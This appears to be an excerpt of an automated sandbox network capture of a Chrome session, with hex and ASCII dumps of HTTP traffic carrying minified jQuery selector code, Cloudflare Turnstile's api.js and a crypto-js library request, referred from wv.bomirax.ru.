                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                          2025-01-14 21:50:26 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.449755104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:27 UTC644OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://wv.bomirax.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:27 UTC471INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:27 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47521
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d77d8c2a43d7-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:27 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.449756104.17.25.144434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:27 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:27 UTC970INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:27 GMT
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: W/"61182885-40eb"
                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 549238
                                                                          Expires: Sun, 04 Jan 2026 21:50:27 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyDusRMTBw3Ad40X0uUTanz7GZVrW0k3%2FhR%2Fr5Nq97wM5VHyVsdddA%2FVsZ%2B8MhQyKZKBIwi%2BMchwjgbIvtKXqn0AAyGK44z88%2BABjIbL%2BHFCayVLPOKP%2B7GVaOPV1h01asUMk9t%2B"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d77e9a503338-EWR
                                                                          alt-svc: h3=":443"; ma=86400
